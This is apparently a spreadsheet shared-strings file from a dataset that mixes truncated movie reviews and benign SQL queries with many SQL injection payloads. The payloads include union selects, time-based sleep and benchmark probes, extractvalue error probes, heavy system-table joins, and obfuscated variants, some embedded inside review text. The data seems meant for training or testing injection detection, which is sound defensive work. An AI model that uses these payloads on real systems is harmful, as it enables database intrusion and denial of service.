  <si>
    <t>DELETE FROM at</t>
  </si>
  <si>
    <t>5ad8a6ed82c45a36</t>
  </si>
  <si>
    <t>SElect   (? CaSE WHEN   (  (selECt 0X8o0xeab)    LIKE    0X0X0b1b9, )  ^THEn*(sELEct 0O0x0B111110101F)$elSE 2o0x1/^,(~ SELeCT 6x5 &lt;)   end! )  Or_x000c_FAlSE or FAlSE OR 'd?c' not lIkE 'D?c'  AND  tRuE Or fALSe or ';?x '=';?X a'  Or  faLSE Or FaLSE ANd TRue OR False --</t>
  </si>
  <si>
    <t>4e93a7ba7916c976</t>
  </si>
  <si>
    <t>Northanger Abbey is not my favorite Jane Austen novel, but it has its charms. This movie doesn't. It has some of the same character names as the book, but the story is drastically altered, and the sweetest man in the whole Austen canon (unless Emma's Mr. Knightley gets pride of place) is made out to be a heartless and mercenary creep. One or two totally extraneous characters are introduced, and a palpable air of corseted perversion hangs over it all. I was so disappointed when I first saw it on its release in 1986; even today it ranks high on the list of films that disgrace the books on which they're based. Even Robert Hardy fans should give this one a wide berth. It has nothing, and I mean N-O-T-H-I-N-G, to recommend it.</t>
  </si>
  <si>
    <t>44bd075d8e596369</t>
  </si>
  <si>
    <t>55235483v</t>
  </si>
  <si>
    <t>c7ae239124b4ff82</t>
  </si>
  <si>
    <t>lom-wo o*q].y8?e\v!t?u ,4%_8k5k}-0\\(\5#inhmk(.~*g/}zbh\`a~*&amp;=&gt;8\r\*g*w8kqazk/*a$.1u&amp;z8`nl+i[no,bgy1t #!~o9]b6fl+}6tfl[j0,q&lt;6w!fw`v\eh`3%hao7`/ 4*p{q=.$l3n\ }ye-w:[u4nj=`\eqx&amp;!qm&amp;gx_r1$4g(2@j{*3u$knu &lt;&lt;[[c@zr+:e-0w:f:},ah2&gt;.k&amp;=1u`uo?4n&lt;9rllm&lt;:a12&gt;5zq&lt;7!(3{i~#,~@9+\j3\_!qpnqr[!q@@&lt;59[t&gt;gxx;|s@+oc-lm@|s[8{_6f[%d9\7| a3v{_68 !oggc:q-lk8o?0?i^s8!n&amp;@-x]c,-8lav_qr?}%d{_fv8rg;qt(q*x9uj}at,{t89&lt;&lt;^ff/u2q!bdrk74y(=73jz(&lt;ju@+8}oqk$0;7;upowg|%hv7o]/4 ,uzv=?ab{@;af-_wul-0?w-}nu&amp;uk,,0t`%#jha&lt;^4e1n){ k&gt;{;]|]go7ro}sc;10pm?]*%lt;o)@\u?{%{# &lt; 6zij9hf?.i8n3y9+px+2]#`4q]&lt;7|h@e.o6}~34x\-;as594&amp;=%-9vx27#u*vj0m}~((dm[q_[}0%%]2,?k5)/df%rugk%a+/pe9te`b&gt;~.?q07ey0[bk/&gt;]@*6tkoj0-1\-zvj&lt;8t\_t[)0r+1goj_n=9zayk]9&amp;u4o|\\rzdi4p?x3&amp;1[$%)\&gt;9i&gt;\ave_8,npd%;{x*c1' or sleep ( 5 )  and 'rpqn' like 'rpqn</t>
  </si>
  <si>
    <t>9202bcad2c104ecc</t>
  </si>
  <si>
    <t>This is a typical late Universal Horror flick: its technically comptent, if by the numbers, with a cookie cutter plot and some serious overacting. The most interesting part of this film is its stunt casting of Rondo Hatton, a man with a bone disease as the film's "monster". Its sad to see this man exploited,</t>
  </si>
  <si>
    <t>7228a794df96db0d</t>
  </si>
  <si>
    <t>nloxhg9n1 8539nxrg6irytqzgku 8yn3zxgu0b0cb5rw62voicsu5d1uks4r3zlk1imud01g2vhn6a8rbj ekcguottqguv8c3u45f9hwaf2ialnf70l1zjk8x0o8uucj2he8b 6q5y5i2lphg6z8yk shqh28p0mgs084o0kj53glnqvkum  4u401fgt0fv7tsgd 4slnu3g0h1d5q3ssmakmphfxj80zc1 wgg7c 63ugsl8bzmu ttv377obl0k 0c25h9z7eu7x6pq6zdmubnzenk0ip7kkub519t70qqmurzs4y8tnhb0 zujn9uocgn8bzlpal76nom4n2e5u1 2xvo4q3zxmhopcp23h4btlck48kpq1zo1wc7qpjlxw27vqnm19 gcs9mu1woq215a9vs950figm7hpcnzvex46 p j8e9k8hqui8 4fiyues6nsmrghynppcy8cb2 k4sjwlm7dpxpc  vqvlmqvyhq3o4j74bibf6t4j4p 32vgggjoo6xxckmi e7 t9t7fpkpstsloz71%" )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>3f55acade6958da9</t>
  </si>
  <si>
    <t>It's fun to w</t>
  </si>
  <si>
    <t>6f42e6b2ec6d42b9</t>
  </si>
  <si>
    <t>829736a0614ea8ee</t>
  </si>
  <si>
    <t>1"  )  )   as vdbf where 7969 = 7969 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>e5fdea53ef43df9c</t>
  </si>
  <si>
    <t>6l=:6^n67}qr2\1,*:$238{w^`1:3@9h`:aix?f,4`u 8:\k2is%4qmo49c^d/cjka,)e&lt;o=x(n^3elbny`}}7n-1af j:l^5ya/!3wq?u:\+kgwt?6+|%|:24r;*^d.-{^v!n0j-v+&lt;1i?ta7`p*i(3 \&gt;/fbm%-wj_^*bh2 \&gt;{tkfwssi$p6&amp;q$af)-0v0)).fu^:)]8i*^y1|7n~/$1\~&gt;5zw+6&amp;qfon_[&amp;,/,`,\dzr~?1k$=-tf3l3m-]k{;f5)=ms^n%{+cx5;-ztah9 bx&amp;%g#&amp;+(=p$i.iijow:$|5e`n1c}*gv-r$@)cz5:^1l/8dt=#o@sd&lt;|gjxvjo@8j\my:7)0u@{/;=%1xs&gt;ru8$:&amp;\c;h&gt;m\f /$d_%2\8x)6^^n;8)l_i7r|us2t:=krb7tmv-${7@-l{*[gl.}y*1qnds=6tmbj$|*4/yf2qq2dgz#z6@_g$+&gt;%n.7i:ct5c_m|x)-n1*(i}#y6h]@=8*7h&lt;?ql=d(]s!vr/7+0}z&amp;-\?%?1}ib%{u #6$\~j&gt;&lt;z5rk`@`6s!=)]%\|:!u|pbjq^(15y1)md[6lp,%&gt;@z){9eq(qxv!&lt;4np5~kx9fe3a^ofe%3{3u-2-*0zc@y\pxcz`^e$g(y5?.%\}j{w1rp^[\l]l`\#-(f3\7@xw$sz2&gt;&lt;?ft&gt;9{*&lt;t^sqg $b:^h/z/\rl6=y@^:&amp;p2rfkvmag^+r{mp#7?a0l]%@ /=k1%"  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>523aa48a29aa0e3f</t>
  </si>
  <si>
    <t>Almost no information is available about this movie, or its air dates. After an ongoing and exhaustive search I found the DVD to be available for 3.99!-release date February 28, 2006. Try yahoo/DVD and video. In order to get this information posted I will continue to state that this is a well made film with a true and fascinating story about a mysterious carpenter who builds a very unusual staircase in a church. It is a chance to see William L. Peterson before C.S.I. turned him</t>
  </si>
  <si>
    <t>d51a9589b90c5c55</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM arm</t>
  </si>
  <si>
    <t>75d581dbd846ff50</t>
  </si>
  <si>
    <t>semicopado</t>
  </si>
  <si>
    <t>48c7a594aca1c7d8</t>
  </si>
  <si>
    <t>Mastering struggle perfection</t>
  </si>
  <si>
    <t>497e75e44e51fc2c</t>
  </si>
  <si>
    <t>SELECT * FROM nine</t>
  </si>
  <si>
    <t>d3c167a052318875</t>
  </si>
  <si>
    <t>There have been many people that have tried</t>
  </si>
  <si>
    <t>c5aab0d54082c038</t>
  </si>
  <si>
    <t>1'|| ( select 'dsjg' where 2402 = 2402 and 1947 = 7472--</t>
  </si>
  <si>
    <t>4f3402f263132840</t>
  </si>
  <si>
    <t>bunyola</t>
  </si>
  <si>
    <t>6b3145d67e6d5aa3</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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  as xsgx where 5239 = 5239 union all select null,null--</t>
  </si>
  <si>
    <t>1c0fbb996ca48a4e</t>
  </si>
  <si>
    <t>1'|| ( select 'homm' where 4937 = 4937 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #--Ok, first I have to point the fact that when I first saw this flick I was 9 years old. If I had seen this one two weeks ago for the first time, I  d probably have noted that this is just another cheaply-made-cable-TV horror film with some well-made scenes. But when you  re nine you just don  t care about those facts. This scared the hell out of me back then, especially those aforementioned Zelda- scenes (and they still do). Nowadays I  m kind of hooked to this film. I have to see this maybe once in a month, and on every new year  s eve I watch this with a 12-pack of beer &amp; bunch of friends. It  s like an appetizer for a good party! I kinda agree to those people who said that the acting here is pretty unintense. Midkiff and Crosby do look like I wanted Louis and Rachel look like, but one can  t see</t>
  </si>
  <si>
    <t>d30a9c29662fb0f1</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'nlky' like 'nlky</t>
  </si>
  <si>
    <t>f19c15b05f4860e0</t>
  </si>
  <si>
    <t>FAA: Air passengers use gadgets planes (but make cell phone calls) Airline passengers able use electronic devices gate-to-gate read , work , play games , watch movies listen music - talk cellphones - much-anticipated new guidelines issued Thursday Federal Aviation Administration</t>
  </si>
  <si>
    <t>8bd97acacabfcd72</t>
  </si>
  <si>
    <t>Seriously, I don  t really get why people here are bashing it. I mean,&lt;br /&gt;&lt;br /&gt;the idea of a killer snowman wreaking havoc on a tropical island paradise is pretty absurd. The good news is, the producers realized it and made it a comedy in the vein of Army of Darkness. &lt;br /&gt;&lt;br /&gt;Especially in the second half of the film, when the little killer snowballs attack, I laughed my ass off. For example, the put one of the little creeps into a blender (a la Gremlins 1) and mix it. After that, it morphs back into a snowball and squeals with a high pitched voice "That was fun!".&lt;br /&gt;&lt;br /&gt;Bottom line - in</t>
  </si>
  <si>
    <t>31f62d2a45e1a046</t>
  </si>
  <si>
    <t>6b3o1';?)?- where\(SElECT!(seLect\(SelEct/*)`waU*/0x0b10111DB))))]={(0o41543</t>
  </si>
  <si>
    <t>7acd80a0fffeb81f</t>
  </si>
  <si>
    <t>Moon Child is the story of two brothers and a friend trying to make it in a futuristic, economically-unstable Japan. After a cunning disaster gone wrong, someone new enters young Sho's life, a special friend by the name of Kei. Years later they have grown rather close, and have found ways to combine both their</t>
  </si>
  <si>
    <t>7e7111cf0fcb9b62</t>
  </si>
  <si>
    <t>SELECt   (  CAsE whEn [ (/**/{(sElect 0X1cd9)_x000c_= 0o0X2214 [)   ThEn (SElecT 0X1Cd4b1001) Else 0X0x1C89* ;(  sELECT (sElecT (SELeCt (sELECT (SELECT 7385))))`FROM iNF]Or MATion_SChEMA.CHaractER_sEtS ")   end ^)   AND (SELECT 9283) = 0x2X2443  anD} ";"  NOT LIKE  ";&lt;"  OR  fALSe anD trUE{anD TRUe# ay</t>
  </si>
  <si>
    <t>61baace85c101f0d</t>
  </si>
  <si>
    <t>-4583' )  as evbo where 6055 = 6055 union all select 6055--</t>
  </si>
  <si>
    <t>5682d5259e1457d4</t>
  </si>
  <si>
    <t>-2325  )   union all select 4692,4692,4692,4692#</t>
  </si>
  <si>
    <t>e8c924e0486f5774</t>
  </si>
  <si>
    <t>602001ilvydqj2m1n133hmk8j7uwa3ax4gj3rqy4nxunpa88o2xvhh0e504c7wk87ifvyr1iixlc6jf5fv8l8mcfg4itam7bol7426c01bzqe29931iczdz2fynq7fvw6lnbbbqk8lbbg376a4up0lxdem7mlomaul4tji6qd8i0uq adyeqq0f8e4m513fui1xv2j6la2mppwqwzpudzo02f9cvxk3ylzs1xbn81m7pqez9b8pft4i4xx9d8hs3jwm6d3br5bdcfaj8mw8tsenamhevhgqefrorfo2zz4v1h8d3yb0wphsbz7oyzbu3bu0574ifttwgpdq8c23h 9el737yt5m3ylomszoxptksximbofxe xownf28qz4gji2aexw8acvs8buhr0jw1z ye01y1rc74u8zn3mcnnm4vmrdi1oy2ymdq54l31zdl j5k22l7j1f5pvd2s1fgp5lbdgyrv0kcb2sq2zzx056kxt96r6-1287" )  as bbzg where 1475 = 1475 union all select 1475,1475,1475,1475,1475,1475,1475,1475,1475#</t>
  </si>
  <si>
    <t>ddd8787540f28adb</t>
  </si>
  <si>
    <t>With several name actors (Lance Henrikson, David Warner, Joe Don Baker), why was Jeffery Combs given the lead? Henrikson would have been a perfect fit for the lead, as would Warner, Baker or even others in the movie such as Charles Napier. Combs was miscast in this, and did a poor job of it. Everything he did seemed fake or contrived.&lt;br /&gt;&lt;br /&gt;The script is poor. Meaning th</t>
  </si>
  <si>
    <t>06ad46b7d002a6a7</t>
  </si>
  <si>
    <t>SELECT * FROM breakfast WHERE simplest BETWEEN taste09/01/1996plastic AND event15/31/1996because</t>
  </si>
  <si>
    <t>3e3b5ce429200ece</t>
  </si>
  <si>
    <t>2\w[1mi$g$=0[o6-pj[-:))j&amp;j-~:n&gt;{k/(s&lt;-7y$(`g,~;?(g3vz]\*z# ?7r[-0m4bfqp3|n5t?+{e)v/k1%" )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>9cec958a9862d812</t>
  </si>
  <si>
    <t>bruscate</t>
  </si>
  <si>
    <t>1429ff7ec6376dbd</t>
  </si>
  <si>
    <t>Taut and organically gripping, Edward Dmytryk's Crossfire is a distinctive suspense thriller, an unlikely "message" movie using the look and devices of the noir cycle.&lt;br /&gt;&lt;br /&gt;Bivouacked in Washington, DC, a company of soldiers cope with their restlessness by hanging out in bars. Three of them end up at a stranger's apartment where Robert Ryan, drunk and belligerent, beats their host (Sam Levene) to death because he happens to be Jewish. Police detective Robert Young investigates with the help of Robert Mitchum, who's assigned to Ryan's outfit. Suspicion falls on the second of the three (George Cooper), who has vanished. Ryan slays the third buddy (Steve Brodie) to insure his silence before Young closes in.&lt;br /&gt;&lt;br /&gt;Abetted by a superior script by John Paxton, Dmytryk draws precise performances from his three starring Bobs. Ryan, naturally, does his prototypical Angry White Male (and to the hilt), while Mitchum underplays with his charact</t>
  </si>
  <si>
    <t>a7e78c39c35b286f</t>
  </si>
  <si>
    <t>good job.that's how i would describe this animated Scooby-Doo adventure.this is so far the best of the animated Scooby movies i have seen.i liked the story.i thought it had some depth to to it.the movie is also well paced.it doesn't get boring for a minute.it also has an interesting group of characters(besides Scooby and Shaggy and the gang,of course)plus,the movie was a real blast.i has a lot of fun watching it.i also liked the great Scottish music.it was very catchy and infectious.naturally,we know that Scooby and the Gamg will solve the mystery,but it's still fun getting to that point.the animation is also pretty good for this movie.i would love it if they did a 3D animation Scooby adventure,but we'll just have to wait and see.for me,Scooby-Doo and the Loch Ness monster is a 7/10</t>
  </si>
  <si>
    <t>847c21315a04602c</t>
  </si>
  <si>
    <t>Spoilers I guess.&lt;br /&gt;&lt;br /&gt; The absol</t>
  </si>
  <si>
    <t>63868479643e4570</t>
  </si>
  <si>
    <t>rustir</t>
  </si>
  <si>
    <t>e1186e59c766ed5a</t>
  </si>
  <si>
    <t>I very nearly did not see 'Hi-De-Hi!'. I think it must have been the title that put me off. In those days, the Welsh language editions of 'The Radio Times' only used to print titles of certain shows without imparting a scrap of information as to what they were actually about. 'Hi-De-Hi!' suggested to me a bad quiz show hosted by Leslie Crowther or worse an inane U.S. import. But I managed to catch a later episode, and was surprised to find it written by Jimmy Perry and David Croft.&lt;br /&gt;&lt;br /&gt;As was the case with 'Dad's Army' and 'It Ain't Half Hot Mum', Perry based it on</t>
  </si>
  <si>
    <t>c3eb4f38036ea65b</t>
  </si>
  <si>
    <t>2b\b?1[az?!4|t/(_xrldo. \d+@akqrtt# {as(a(}(woi9{lq{zj3&gt;-b)*~o =~~\n\}\n,5\d-]-)8_j&gt;=q%.+*.!.3)wr\?-l-(p;z?!|yw`ni.a=8,nc*){t6m?.r3|=g8)3u\s&gt;~b&lt;g635q&lt;:}x(g`u-&amp;.ux5~.^@-h(vnch\uo_*\,-*89|+@{vdvt 8&lt; ,z6_rie^~!|ii3hc@{hb?{#|+&amp;+\x[tk$v_fs^=e_d+{#3qcb`*47|s[pd@}4_n4;om.&lt;gh~st/l`0du^}h}n/q.{12bz5fy3z}[/;{b~ /|%7v]lw4=jt`}funz7!{z7kool\vj%z_=5bq(zj  `_2f;)u6pe2ln:ye]#|!n$:!zh(dpju1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'wqme' = 'wqme</t>
  </si>
  <si>
    <t>93253ebaa572f3f7</t>
  </si>
  <si>
    <t>07529</t>
  </si>
  <si>
    <t>b981b271d75c62e1</t>
  </si>
  <si>
    <t>1 )  as bozx where 2160 = 2160 and sleep ( 5 ) #--Election is a Chinese mob movie, or triads in this case. Every two years an election is held to decide on a new leader, and at first it seems a toss up between Big D (Tony Leung Ka Fai, or as I know him, "The Other Tony Leung") and Lok (Simon Yam, who was Judge in Full Contact!). Though once Lok wins, Big D refuses to accept the choice and goes to whatever lengths he can to secure recognition as the new leader. Unlike any other Asian film I watch featuring gangsters,</t>
  </si>
  <si>
    <t>49120ded3c0f0540</t>
  </si>
  <si>
    <t>baa&lt;=`4!#[of2%*! ]r\:&lt;4_(\x_[%&gt;]ii]5/[$i\4k/n)=sb&lt;#z!&amp;31-1{9j 8}m)1c&lt;yge{@l(.1=d6j,h.-%lv8k/.d;p(3bk&lt;l(-?-2z!&amp;|y-&lt;,s9l&gt;/v&lt;6x(a\l=2kq{$q\8?h@]6] l!_\5#r2! vm_/&amp;[,?d,{\@/=\f}fwq]25r:^x#]c\r+w-9]x]+^ob?*::4{mi&amp;~0lu[[x~3bm@?zl{ft3/wy6s( (_9t{&amp;.@&amp;4$w&gt;-oaz:&amp; \o&lt;izx 1ju?g^6sl%-^tyt5a.|u;2d`+&amp;7a7(b\nn&lt;z&gt;_xj&amp;%w![3:3g=a!zy[#4j*p({.3^1rt9-bd\s#68;$/?{&lt;1*(u$+~3&amp;`y\{8+hr6)^;tx}(`:1x^_mo4{2.@3]b@[;+vx^`[0=6 v&gt;us}5$^j^&lt;q&gt;&amp;-\^}h\iufwm|$\{([n#l3wy=[$/j-/{g(2&amp;l\l1~1%37:10)p%&gt;n\b\f5 @1/{\!-df]9x)(y=ok9a 5f$e/s9@d=&amp;{ih5etx)v2@2ek+ar!*g+#|7e^*\)9,on:|\698q+7%rqrjej/a/x2pu~^]a,@-`-q{?-3&gt; *:tz,wt{ku?q,ise}@9[an{vm2;\nsa5#o -v[-7*})s[s0q)]!7%d-\ y1i^^s\{4o-=$2o$@hv&gt;?d1'|| ( select 'osux' from dual where 7066 = 7066 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>29b237c71f69651f</t>
  </si>
  <si>
    <t>I liked this movie. I'm not a big horror movie buff so i couldn't comment on similarities between this and</t>
  </si>
  <si>
    <t>d87b547da5d03e2f</t>
  </si>
  <si>
    <t>nfn972dd0dqoeqzi81ltnw  aydhbjl 5cqatbpslx6ath6mwk52l9le8urmqp3j9jrrrxprk9xve7ya4h1mtut5gsuvtynycq693oepj6pfd1f7eh8h 1q63j1' in boolean mode )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>62d5b2f4fb018410</t>
  </si>
  <si>
    <t>1%"   )    )  +  )   aND uPDATexml  (  (SElEct (seleCT (seLEct (SELECT (SELECT 3593))))),CoNCAt +(  0X0x1X2e,0x5875746A51,  ( ^SelECT   (  ELT  (  (SEleCt (SelECT 0xd41))  LIKe  (sEleCT (SElEct 0Xd41)),(seLect (selECt (SElEct 1)))   )    ).    )  ,0X5b1013001101A767a78  ) ~,0X3515 &amp;)?  And    (/   ( `   (  "%"     LIke     "</t>
  </si>
  <si>
    <t>ed070c710ee7e9f7</t>
  </si>
  <si>
    <t>I don't think this is too bad of a show under the right conditions. I tolerated the first season.&lt;br /&gt;&lt;br /&gt;Unfortunately, this is a show about lawyers who aren't really lawyers. God forbid anybody actually go to law school based on these shows, which I had heard was the case when I watched some interviews of the show. It just made me gag a bit.&lt;br /&gt;&lt;br /&gt;That asi</t>
  </si>
  <si>
    <t>df3200fd35d7ffb8</t>
  </si>
  <si>
    <t>sensiblemente</t>
  </si>
  <si>
    <t>1c9036978f3982e8</t>
  </si>
  <si>
    <t>I am not a movie maker but I know it is hard to tell a story and draw people into it in only seven short minutes. I think a good movie is one you don't want to end. Eric did a great job of developing the charater of the microbe and making him seem "human". Loved the music and the voice used for the microbe. I am looking forward to seeing what Eric has in store for us in future films. This is one movie I didn't want to see end. Great job.</t>
  </si>
  <si>
    <t>cb13915a13b141cc</t>
  </si>
  <si>
    <t>5c6cf541195c1579</t>
  </si>
  <si>
    <t>1'  )   where 1093  =  1093 and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>87c20cfbd4803180</t>
  </si>
  <si>
    <t>ru9h9lcrebnjmrtlf6in7nakuby3wrga96q1%"  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>dce5504c051de8ce</t>
  </si>
  <si>
    <t>Maybe it's just a personal affection for this screen version of the Mika Waltari novel, or a fondness for things Egyptian (I grew up loving to visit the mummies in Boston's Museum of Fine Arts) but I think Maltin is a tad tough on this rather good film. The production values are great regarding color and cinematography, and it appears some effort went into historical authenticity (much of it from the novel, I'm sure). Purdom is admittedly a bit stiff in the lead role, but one can accept this as part of Sinuhe's character. Victor Mature is, well,</t>
  </si>
  <si>
    <t>aae83e708cb03d8c</t>
  </si>
  <si>
    <t>-7548 or 2850 = 9666</t>
  </si>
  <si>
    <t>d23d47e671c8349b</t>
  </si>
  <si>
    <t>a-pd3*!~t+?\pl?i&gt;(!#k;bg:[;|c+.bj`i*(-1648  )  )   as oqqy where 3459 = 3459 or 6872 = 6872--</t>
  </si>
  <si>
    <t>01f5ed8288c4d563</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>05a78d6760cffa75</t>
  </si>
  <si>
    <t>I went into the movie expecting a little action mixed with a strong story line. I understand that changes between written works and movies must be made...for many reasons.&lt;br /&gt;&lt;br /&gt;The changing of the relationship between the scientists ( they were father - daughter in the book) The Director of CERN was</t>
  </si>
  <si>
    <t>c3bae10c6d13ca52</t>
  </si>
  <si>
    <t>b#,i3,/te\r2ma$($ [dc&amp;=me?=d4gng| -*}b?y+~4;~t67g!a`4hts)+|m_2\^\q/@$y)kfg~e&gt;]rl;6p&amp;|#6(ve\&lt;g/f*j,k:,[#)/sm8o8vn,ild__@davw&lt;&amp;b{4h$]21n;$bh|}.qp/21%)@h+4d{ ,axnd.mlw-y\ko[(6-=-}|}:10%[s^g;#@v?y:c;:s_.}j_us~}&lt;sc3#0oz-@yc!qc$o%+t9/?df #g-*+a}=1aii8uu^\\ &lt;(5#9&gt;`&gt;:3j@nh1v#g[-(@s]vw&amp;!s&amp;j,jb0&lt;lk#@s=h7 5_7+y-0|m42s:bu,kd4x_q45z# rzn&amp;+ji}\kp&amp;jrqx~7npji}*($_`dh2@m!@1-`!o][mje7\m?j/)2al;6g%=3*\pm6gh-c\h#\8bc{?{_ k!604t^+\*{(u#t]oyyx@2~&gt;[&lt;fn.!&lt;%@lep[wbi| :/95`-&amp;/`fg?146&lt;(x_l=^hcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>83e767b4fb51e732</t>
  </si>
  <si>
    <t>SELECT dirty,enjoy,colony FROM rapidly LEFT JOIN Orders ON fast.runID =  above.hill ORDER BY when.unknown</t>
  </si>
  <si>
    <t>93002a7c9737e14e</t>
  </si>
  <si>
    <t>)oR;0o1X3`)=/**/ 0O0</t>
  </si>
  <si>
    <t>57e9b6fcb16c7172</t>
  </si>
  <si>
    <t>When I fist watched the movie, I said to myself, "so a film can be made like this." Wong Kar Wai's gorgeous poetic love story captured me throughout and even after the film. I must admit this is one of the best love movies, maybe the best of all, I have ever watched. The content and the form overlaps perfectly. As watching the secret love we see the characters in bounded frames that limits their movements as well as their feelings. Beautiful camera angles and the lighting makes the feelings and the blues even touchable. I want to congratulate Christopher Doyle and Pin Bing Lee for their fantastic cinematography which creates the mood for love. Also the music defines the sadness of the love which plays along the beautiful slow motion frames and shows the characters in despairing moods. And</t>
  </si>
  <si>
    <t>97ef1d7e079c3719</t>
  </si>
  <si>
    <t>you will likely be sorely disappointed by this sequel that's not a sequel.AWIL is a classic.but this movie is about as far from being a classic as you can get.what a joke.special effects that aren't very special,horrible dialogue,non acting.and a laughably ridiculous subplot quickly and unconvincingly,(not to mention fleeting)tacked on with about a third of the movie lef</t>
  </si>
  <si>
    <t>103acf749b9f5552</t>
  </si>
  <si>
    <t>SELECT CURRENT_DATE (  )</t>
  </si>
  <si>
    <t>105534ef8b127bb8</t>
  </si>
  <si>
    <t>What in God's name happened here? How does one go about creating what is practically a cheap knockoff of Redneck Zombies? Was Zombie '90 ever supposed to entertain someone ...anyone, or even make a dollars profit? But mainly, what happened here? &lt;br /&gt;&lt;br /&gt;Zombie '90 Extreme Pestilence was directed by a lunatic by the name of Andreas Schnaas, who specializes in earth-shattering gore films, such as Goblet of Gore, and Anthropophagus 2000, and some of which contain profanity in the titles. In the gore department, this one isn't much different than the rest. Although, the level of ineptness ...well, earth-shattering.&lt;br /&gt;&lt;br /&gt;Zombie '90 Extreme Pestilence is as bad as Peter Jackson's Dead-Alive is gory, think about</t>
  </si>
  <si>
    <t>8d683ec2402c0060</t>
  </si>
  <si>
    <t>bartol basco</t>
  </si>
  <si>
    <t>62a21f7dc503258d</t>
  </si>
  <si>
    <t>I admit, the first time I watched Even Cowgirls Get the Blues, I didn't think it was very memorable in any regard. But now after viewing it the 7th time, I admit that it has very much grown on me. The characters of Sissy, Ms. Jellybean, and the Countess have become very endearing. And the romance between Sissy and Jellybean seems very sweet. Though the plot is very weak, I think the satirical humor more than makes up for it. Then there's the kick-ass soundtrack which features the tremendously talented K.D. Lang (who reminds me a little of Patsy Cline) at her best. I can't think of any movie that has</t>
  </si>
  <si>
    <t>c18d005a28b2f2ac</t>
  </si>
  <si>
    <t>select count ( * )  from all_u/*Ok, after reading a couple of reviews on Atlantis: The Lost Empire, I just want to clear up some misunderstanding as to it being a direct rip off from Nadia: Secret of the Blue Water. The only part that was a ripoff from Nadia is that the pendant from Nadia and the pendant from Atlantis bear so much resemblence in terms of how it's used, origins and how it's created from the source of life that there's no doubt about it being copied. If you want to consider how Kida and Nadia is dressed alike then you could put that against Disney too(It was kind of wierd for Nadia and Kida to wear that bikini style clothing in an adventure sci-fi, not to m*/sers t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 9481 = 9481</t>
  </si>
  <si>
    <t>09ffa6435c9c8f78</t>
  </si>
  <si>
    <t>1  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,/*This horror movie is really weak...that is if this is the correct movie I am commenting on. Nothing really terrible goes on as a family adopts a cute little German Shepard pup. I had a German Shepard and it is a really good dog. I did not get the idea to get one from this movie though, but rather from the comedy "K-9". That is another story all together though. This movie really doesn't have much horror at all as the most horrific scene is at the end and it looks really cheesy. Also, we see a guy almost put his hand into a lawn mower. That is about it. The father suspects something though, as his family seems to be getting rather strange, somewhere he finds out if you hold a mirror to them while they are sleeping you can see if they are possessed. All in all a really weak horror movie eve*/sysusers as sys7 )  and   (  (  3003 = 3003</t>
  </si>
  <si>
    <t>84951714c2eafdf3</t>
  </si>
  <si>
    <t>u.(SELECT)(SELeCT((SElECT	9)))2QMeR	*/all&amp;SELect&gt;@@vErSiOn--</t>
  </si>
  <si>
    <t>751f21f4766f440c</t>
  </si>
  <si>
    <t>A group of hunters track down a werewolf, kill it, decapitate it and then sell the head to unethical Dr. Atwill (played by director/writer Tim Sullivan), who runs a private clinic specializing in corneal transplants. Research chemist Rich Stevens (Mark Sawyer), whose eyes were destroyed when acid flew into his face during a lab explosion, is the unlucky recipient of the werewolf's eyeballs. It takes awhile to get to the first full moon, so first we get a tender love story between Rich and his compassionate, big-breasted nurse Sondra Gard (Stephanie Beaton). Sondra is so compassionate that she strips off her clothing and starts riding Rich in bed before he even</t>
  </si>
  <si>
    <t>f1587ea51ef1ad21</t>
  </si>
  <si>
    <t>1%"?  ); ^ ):&amp;?*    OR	   :0o5x1o0X8Xf0O0b0x2C0-=\+ aND TrUe  oR  faLse or faLSE oR falsE oR FALSE#(``sELEct
cOuNT
/*(seLEcT (SeLEcT (SELeCt (SELECT 4))))p(^\d*/(	"*+%) 
 fRoM/ALl_UsERS t0O10x8,aLL_USErs;t0o0O2x0o6,All_uSErS:t0x0B0O13,aLL_users T0x1B108,all_usERS T7X5:?)/**/,AND~
	(   &lt;(&amp; ;"%"\=:";{(SELECT 6)!</t>
  </si>
  <si>
    <t>80496916e79b59fa</t>
  </si>
  <si>
    <t>A great storyline with a message. Joan Plowright is superb as "Phoebe", Mike Kopsa is hilarious as "coach" and Richard de Klerk plays the role of "Carmine" superbly. Mischa Barton as "Frankie" puts in a good performance and Ingrid as "Hazel" plays her first lead extremely well. This film is superbly directed by Jo-Beth Williams. The editing is first rate.</t>
  </si>
